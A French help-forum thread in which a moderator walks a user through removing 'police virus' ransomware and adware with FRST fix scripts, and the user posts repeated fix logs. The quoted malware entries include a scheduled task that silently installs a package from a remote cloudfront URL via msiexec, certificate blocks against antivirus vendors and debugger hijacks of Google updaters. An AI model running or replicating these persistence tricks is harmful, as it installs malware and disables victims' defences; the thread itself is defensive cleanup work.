Rapport Frst - Mystarting 123 et virus Police
Fermé
TimberX
Messages postés
5
Date d'inscription
lundi 12 juin 2017
Statut
Membre
Dernière intervention
19 juin 2017
-
13 juin 2017 à 22:36
TimberX Messages postés 5 Date d'inscription lundi 12 juin 2017 Statut Membre Dernière intervention 19 juin 2017 - 19 juin 2017 à 13:47
TimberX Messages postés 5 Date d'inscription lundi 12 juin 2017 Statut Membre Dernière intervention 19 juin 2017 - 19 juin 2017 à 13:47
A voir également:
- Rapport Frst - Mystarting 123 et virus Police
- Police facebook - Guide
- Formate de menace police interpol - Forum Vos droits sur internet
- Frst windows - Télécharger - Sécurité
- Formate de bara police interpol ✓ - Forum Vos droits sur internet
- 123 service appel ✓ - Forum SFR
4 réponses
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 628
13 juin 2017 à 22:58
13 juin 2017 à 22:58
Salut,
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
C:\Program Files (x86)\MIO
Task: {8853C07E-2AC0-4711-AB09-6DAECCFC0CD0} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== ATTENTION
Task: {A49D2D87-6B28-4245-AD5F-D36C230401D4} - System32\Tasks\Sterjerent Monitor => C:\Program Files (x86)\Nalugethedation\geqph.exe [2017-05-06] (Google Inc.)
Task: {E0FFD875-851D-47DF-9C43-1BA4043FA9F3} - System32\Tasks\Ckhase => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=SanDiskXSD8SNAT128G1002_164436448492&d=20170506 /q <==== ATTENTION
Task: {CDE030E7-6B1E-49AD-A623-E327E5D5DF9B} - System32\Tasks\Microsoft\Windows\MemoryDiagnostic\VideoMemoryDiagnostic => C:\\ProgramData\\VideoMemoryDiagnostic\\vmdiag.exe <==== ATTENTION
C:\\ProgramData\\VideoMemoryDiagnostic
C:\Users\ASUS\AppData\Roaming\AppTrailers
HKLM-x32\...\Run: [AppTrailers] => C:\Users\ASUS\AppData\Roaming\AppTrailers\AppTrailers.exe [47835880 2017-03-28] () <===== ATTENTION
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <====== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKU\S-1-5-21-3645719468-3810714764-2439910976-1001\...\Run: [background_fault] => C:\Users\ASUS\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-26] (AVAST Software) <===== ATTENTION
C:\Users\ASUS\AppData\Local\background_fault
C:\Program Files (x86)\Sterjerent Monitor
017-05-26 16:50 - 2017-06-07 20:36 - 00000000 ____D C:\ProgramData\BIT
2017-05-26 16:50 - 2017-05-26 19:45 - 00000000 ____D C:\Users\ASUS\AppData\Local\background_fault
2017-05-26 16:49 - 2017-06-07 22:08 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\WinSAPSvc
2017-05-26 16:49 - 2017-05-27 16:10 - 00000000 ____D C:\Users\ASUS\AppData\Local\terana
2017-05-26 16:49 - 2017-05-27 16:10 - 00000000 ____D C:\Program Files (x86)\BJBMD
2017-05-26 16:49 - 2017-05-26 16:49 - 00000000 ____D C:\Program Files (x86)\MIO
2017-05-26 16:47 - 2017-06-01 14:39 - 00034328 _____ (Sysinternals - www.sysinternals.com) C:\WINDOWS\system32\Drivers\PROCEXP152.SYS
2017-05-26 16:47 - 2017-05-26 16:49 - 00000000 ____D C:\Program Files\MK
2017-05-26 16:44 - 2017-05-26 16:44 - 00000000 ____D C:\Program Files\0nwllcte
2017-05-26 14:28 - 2017-06-07 21:23 - 00000000 ___DC C:\WINDOWS\Panther
2017-05-26 14:24 - 2017-05-26 14:24 - 00000000 ___HD C:\Users\ASUS\AppData\Roaming\GiftBox
2017-05-24 22:10 - 2017-05-24 22:10 - 00000000 ____D C:\Users\ASUS\AppData\Local\UNP
2017-05-24 22:02 - 2017-05-26 19:38 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-05-24 22:02 - 2017-05-24 22:03 - 00000000 ____D C:\Program Files\UNP
2017-06-04 20:30 - 2017-05-06 12:08 - 00000000 ____D C:\Program Files (x86)\Nalugethedation
2017-06-12 19:49 - 2017-05-06 12:10 - 00000000 ____D C:\Users\ASUS\AppData\Local\AppTrailers
2017-05-21 21:37 - 2017-05-06 12:08 - 00000000 ____D C:\ProgramData\VideoMemoryDiagnostic
2017-05-21 21:36 - 2017-05-06 12:08 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\Molery
2017-05-21 21:34 - 2017-05-06 12:10 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\AppTrailers
2017-06-02 17:49 - 2017-06-02 17:49 - 00000000 ____D C:\Program Files (x86)\Default Company Name
2017-06-01 14:39 - 2017-06-11 14:34 - 00000000 ____D C:\Users\ASUS\AppData\Local\glory
2017-06-01 14:39 - 2017-06-04 20:31 - 00000000 ____D C:\Stuvatybugtain
HKLM\...\Providers\0nwllcte: C:\Program Files (x86)\Sterjerent Monitor\local64spl.dll [315392 2017-05-06] () <===== ATTENTION
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
TimberX
Messages postés
5
Date d'inscription
lundi 12 juin 2017
Statut
Membre
Dernière intervention
19 juin 2017
14 juin 2017 à 22:08
14 juin 2017 à 22:08
Alors, j'ai bien suivi le tuto, depuis je n'ai pas eu le virus "police".
Par contre je n'arrive toujours pas à réinstaller Chrome, l'install ne se lance pas.
J'ai aussi essayé de faire un nettoyage avec Malwarebytes et je ne peux pas l'installer, j'ai le message windows suivant (même message que lorsque je veux installer adwcleaner) :
https://pjjoint.malekal.com/files.php?id=20170614_c13n14x699
Voici le fichier fixlog.txt :
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 14-06-2017
Exécuté par ASUS (14-06-2017 21:25:56) Run:1
Exécuté depuis D:\Bureau
Profils chargés: ASUS (Profils disponibles: defaultuser0 & ASUS)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
C:\Program Files (x86)\MIO
Task: {8853C07E-2AC0-4711-AB09-6DAECCFC0CD0} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== ATTENTION
Task: {A49D2D87-6B28-4245-AD5F-D36C230401D4} - System32\Tasks\Sterjerent Monitor => C:\Program Files (x86)\Nalugethedation\geqph.exe [2017-05-06] (Google Inc.)
Task: {E0FFD875-851D-47DF-9C43-1BA4043FA9F3} - System32\Tasks\Ckhase => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=SanDiskXSD8SNAT128G1002_164436448492&d=20170506 /q <==== ATTENTION
Task: {CDE030E7-6B1E-49AD-A623-E327E5D5DF9B} - System32\Tasks\Microsoft\Windows\MemoryDiagnostic\VideoMemoryDiagnostic => C:\\ProgramData\\VideoMemoryDiagnostic\\vmdiag.exe <==== ATTENTION
C:\\ProgramData\\VideoMemoryDiagnostic
C:\Users\ASUS\AppData\Ro
HKLM-x32\...\Run: [AppTrailers] => C:\Users\ASUS\AppData\Roaming\AppTrailers\AppTrailers.exe [47835880 2017-03-28] () <===== ATTENTION
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <====== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKU\S-1-5-21-3645719468-3810714764-2439910976-1001\...\Run: [background_fault] => C:\Users\ASUS\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-26] (AVAST Software) <===== ATTENTION
C:\Users\ASUS\AppData\Local\background_fault
C:\Program Files (x86)\Sterjerent Monitor
017-05-26 16:50 - 2017-06-07 20:36 - 00000000 ____D C:\ProgramData\BIT
2017-05-26 16:50 - 2017-05-26 19:45 - 00000000 ____D C:\Users\ASUS\AppData\Local\background_fault
2017-05-26 16:49 - 2017-06-07 22:08 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\WinSAPSvc
2017-05-26 16:49 - 2017-05-27 16:10 - 00000000 ____D C:\Users\ASUS\AppData\Local\terana
2017-05-26 16:49 - 2017-05-27 16:10 - 00000000 ____D C:\Program Files (x86)\BJBMD
2017-05-26 16:49 - 2017-05-26 16:49 - 00000000 ____D C:\Program Files (x86)\MIO
2017-05-26 16:47 - 2017-06-01 14:39 - 00034328 _____ (Sysinternals - www.sysinternals.com) C:\WINDOWS\system32\Drivers\PROCEXP152.SYS
2017-05-26 16:47 - 2017-05-26 16:49 - 00000000 ____D C:\Program Files\MK
2017-05-26 16:44 - 2017-05-26 16:44 - 00000000 ____D C:\Program Files\0nwllcte
2017-05-26 14:28 - 2017-06-07 21:23 - 00000000 ___DC C:\WINDOWS\Panther
2017-05-26 14:24 - 2017-05-26 14:24 - 00000000 ___HD C:\Users\ASUS\AppData\Roaming\GiftBox
2017-05-24 22:10 - 2017-05-24 22:10 - 00000000 ____D C:\Users\ASUS\AppData\Local\UNP
2017-05-24 22:02 - 2017-05-26 19:38 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-05-24 22:02 - 2017-05-24 22:03 - 00000000 ____D C:\Program Files\UNP
2017-06-04 20:30 - 2017-05-06 12:08 - 00000000 ____D C:\Program Files (x86)\Nalugethedation
2017-06-12 19:49 - 2017-05-06 12:10 - 00000000 ____D C:\Users\ASUS\AppData\Local\AppTrailers
2017-05-21 21:37 - 2017-05-06 12:08 - 00000000 ____D C:\ProgramData\VideoMemoryDiagnostic
2017-05-21 21:36 - 2017-05-06 12:08 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\Molery
2017-05-21 21:34 - 2017-05-06 12:10 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\AppTrailers
2017-06-02 17:49 - 2017-06-02 17:49 - 00000000 ____D C:\Program Files (x86)\Default Company Name
2017-06-01 14:39 - 2017-06-11 14:34 - 00000000 ____D C:\Users\ASUS\AppData\Local\glory
2017-06-01 14:39 - 2017-06-04 20:31 - 00000000 ____D C:\Stuvatybugtain
HKLM\...\Providers\0nwllcte: C:\Program Files (x86)\Sterjerent Monitor\local64spl.dll [315392 2017-05-06] () <===== ATTENTION
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
C:\Program Files (x86)\MIO => déplacé(es) avec succès
Merci !!!
Par contre je n'arrive toujours pas à réinstaller Chrome, l'install ne se lance pas.
J'ai aussi essayé de faire un nettoyage avec Malwarebytes et je ne peux pas l'installer, j'ai le message windows suivant (même message que lorsque je veux installer adwcleaner) :
https://pjjoint.malekal.com/files.php?id=20170614_c13n14x699
Voici le fichier fixlog.txt :
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 14-06-2017
Exécuté par ASUS (14-06-2017 21:25:56) Run:1
Exécuté depuis D:\Bureau
Profils chargés: ASUS (Profils disponibles: defaultuser0 & ASUS)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
C:\Program Files (x86)\MIO
Task: {8853C07E-2AC0-4711-AB09-6DAECCFC0CD0} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== ATTENTION
Task: {A49D2D87-6B28-4245-AD5F-D36C230401D4} - System32\Tasks\Sterjerent Monitor => C:\Program Files (x86)\Nalugethedation\geqph.exe [2017-05-06] (Google Inc.)
Task: {E0FFD875-851D-47DF-9C43-1BA4043FA9F3} - System32\Tasks\Ckhase => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=SanDiskXSD8SNAT128G1002_164436448492&d=20170506 /q <==== ATTENTION
Task: {CDE030E7-6B1E-49AD-A623-E327E5D5DF9B} - System32\Tasks\Microsoft\Windows\MemoryDiagnostic\VideoMemoryDiagnostic => C:\\ProgramData\\VideoMemoryDiagnostic\\vmdiag.exe <==== ATTENTION
C:\\ProgramData\\VideoMemoryDiagnostic
C:\Users\ASUS\AppData\Ro
HKLM-x32\...\Run: [AppTrailers] => C:\Users\ASUS\AppData\Roaming\AppTrailers\AppTrailers.exe [47835880 2017-03-28] () <===== ATTENTION
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <====== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKU\S-1-5-21-3645719468-3810714764-2439910976-1001\...\Run: [background_fault] => C:\Users\ASUS\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-26] (AVAST Software) <===== ATTENTION
C:\Users\ASUS\AppData\Local\background_fault
C:\Program Files (x86)\Sterjerent Monitor
017-05-26 16:50 - 2017-06-07 20:36 - 00000000 ____D C:\ProgramData\BIT
2017-05-26 16:50 - 2017-05-26 19:45 - 00000000 ____D C:\Users\ASUS\AppData\Local\background_fault
2017-05-26 16:49 - 2017-06-07 22:08 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\WinSAPSvc
2017-05-26 16:49 - 2017-05-27 16:10 - 00000000 ____D C:\Users\ASUS\AppData\Local\terana
2017-05-26 16:49 - 2017-05-27 16:10 - 00000000 ____D C:\Program Files (x86)\BJBMD
2017-05-26 16:49 - 2017-05-26 16:49 - 00000000 ____D C:\Program Files (x86)\MIO
2017-05-26 16:47 - 2017-06-01 14:39 - 00034328 _____ (Sysinternals - www.sysinternals.com) C:\WINDOWS\system32\Drivers\PROCEXP152.SYS
2017-05-26 16:47 - 2017-05-26 16:49 - 00000000 ____D C:\Program Files\MK
2017-05-26 16:44 - 2017-05-26 16:44 - 00000000 ____D C:\Program Files\0nwllcte
2017-05-26 14:28 - 2017-06-07 21:23 - 00000000 ___DC C:\WINDOWS\Panther
2017-05-26 14:24 - 2017-05-26 14:24 - 00000000 ___HD C:\Users\ASUS\AppData\Roaming\GiftBox
2017-05-24 22:10 - 2017-05-24 22:10 - 00000000 ____D C:\Users\ASUS\AppData\Local\UNP
2017-05-24 22:02 - 2017-05-26 19:38 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-05-24 22:02 - 2017-05-24 22:03 - 00000000 ____D C:\Program Files\UNP
2017-06-04 20:30 - 2017-05-06 12:08 - 00000000 ____D C:\Program Files (x86)\Nalugethedation
2017-06-12 19:49 - 2017-05-06 12:10 - 00000000 ____D C:\Users\ASUS\AppData\Local\AppTrailers
2017-05-21 21:37 - 2017-05-06 12:08 - 00000000 ____D C:\ProgramData\VideoMemoryDiagnostic
2017-05-21 21:36 - 2017-05-06 12:08 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\Molery
2017-05-21 21:34 - 2017-05-06 12:10 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\AppTrailers
2017-06-02 17:49 - 2017-06-02 17:49 - 00000000 ____D C:\Program Files (x86)\Default Company Name
2017-06-01 14:39 - 2017-06-11 14:34 - 00000000 ____D C:\Users\ASUS\AppData\Local\glory
2017-06-01 14:39 - 2017-06-04 20:31 - 00000000 ____D C:\Stuvatybugtain
HKLM\...\Providers\0nwllcte: C:\Program Files (x86)\Sterjerent Monitor\local64spl.dll [315392 2017-05-06] () <===== ATTENTION
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
C:\Program Files (x86)\MIO => déplacé(es) avec succès
Merci !!!
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 628
14 juin 2017 à 23:10
14 juin 2017 à 23:10
essaye cet outil : https://toolslib.net/downloads/viewdownload/385-avcertclean/
TimberX
Messages postés
5
Date d'inscription
lundi 12 juin 2017
Statut
Membre
Dernière intervention
19 juin 2017
19 juin 2017 à 13:47
19 juin 2017 à 13:47
Bonjour,
Le virus police est toujours là hélas, je l'ai eu aujourd'hui.
Je n'arrive toujours pas non plus à réinstaller chrome...
Faut-il que je réinstalle windows 10 ou que je fasse une récupération du système ?
Merci beaucoup pour vos conseils !
Le virus police est toujours là hélas, je l'ai eu aujourd'hui.
Je n'arrive toujours pas non plus à réinstaller chrome...
Faut-il que je réinstalle windows 10 ou que je fasse une récupération du système ?
Merci beaucoup pour vos conseils !
14 juin 2017 à 13:13
Bravo pour votre site extrêmement utile !
14 juin 2017 à 17:37